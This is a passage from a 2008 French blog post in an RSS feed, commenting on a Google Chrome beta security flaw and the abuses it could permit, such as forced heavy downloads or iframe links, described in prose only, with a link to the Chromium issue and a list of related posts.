<p style="text-align: justify;">Simple mais efficace pour celui qui n&#8217;a pas d&#8217;antivirus ou autre. Nous pouvons même imaginer de mettre un fichier très lourd, ce qui saturera votre connexion internet. Je pense à nos amis de belgiques qui ont des quotas imposés par leur fournisseurs d&#8217;accès (et oui ça existe encore ! <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  ). Ou encore à celui dont l&#8217;ip fera parti d&#8217;une liste à surveiller par le gouvernement car via l&#8217;iframe le lien contenait un lien vers un site pédophile ou autre&#8230;</p>
<p style="text-align: justify;">Bref vous l&#8217;aurez compris ce genre de faille n&#8217;est pas à prendre à la légère. Voilà qui devrait calmer tous ceux qui ont déjà abandonné leur Firefox ou Opera. Tous deux restent dans le domaine de la sécurité deux gros poids lourds <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<h2 style="text-align: justify;">Pourquoi s&#8217;alarmer ?</h2>
<p><img class="alignright size-full wp-image-774" style="margin: 5px;" title="blog-stats" src="http://xhark.fr.nf/wp-content/uploads/2008/09/blog-stats.png" alt="" width="166" height="153" /></p>
<p style="text-align: justify;">Ce qui me fait plutôt peur, c&#8217;est lorsque je regarde les statistiques du blog au niveau des navigateurs : hier, vous étiez 21,3% à afficher le blog avec Chrome, sûrement pour l&#8217;essayer hein <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  Mais cela veut dire que le nombre de gens utilisant Chrome ne cessera d&#8217;augmenter, et que si Google ne réagit pas très rapidement sur ce genre de problèmes Chrome risque très vite d&#8217;avoir mauvaise réputation&#8230; et vous auriez raison de le penser.</p>
<p style="text-align: justify;">La version de Google Chrome impactée par cette faille est la v. bêta 0.2.149.27.</p>
<p><p style="border-top: 2px solid rgb(65, 105, 175); border-bottom: 2px solid rgb(65, 105, 175); padding: 5px 20px 5px 45px; background: rgb(223, 235, 255) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/world.gif) no-repeat scroll 15px 50%; text-align: left; color: rgb(102, 102, 102);"><a href="http://code.google.com/p/chromium/issues/detail?id=122">Faille numéro 1 reconnue par Google</a></p></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/systeme/failles-google-chrome-772">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 04/09/2008 |
<a href="http://blogmotion.fr/systeme/failles-google-chrome-772#comments">5 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>
	<h4>Articles relatifs</h4>
	<ul class="st-related-posts">
	<li><a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275" title="Une faille DoS qui plante Firefox 3.0.6 (24 février 2009)">Une faille DoS qui plante Firefox 3.0.6</a> (2)</li>
	<li><a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015" title="Exploit de DoS touchant IE 6, 7 et 8 (15 janvier 2009)">Exploit de DoS touchant IE 6, 7 et 8</a> (6)</li>
	<li><a href="http://blogmotion.fr/internet/exploit-xss-apple-4339" title="Une faille XSS sur Apple.com non corrigée (4 novembre 2009)">Une faille XSS sur Apple.com non corrigée</a> (4)</li>
	<li><a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882" title="Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora (20 janvier 2010)">Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora</a> (5)</li>
	<li><a href="http://blogmotion.fr/internet/le-navigateur-de-google-ne-decoit-pas-google-chrome-743" title="Le navigateur de Google ne déçoit pas (Google Chrome) (2 septembre 2008)">Le navigateur de Google ne déçoit pas (Google Chrome)</a> (17)</li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/systeme/failles-google-chrome-772/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
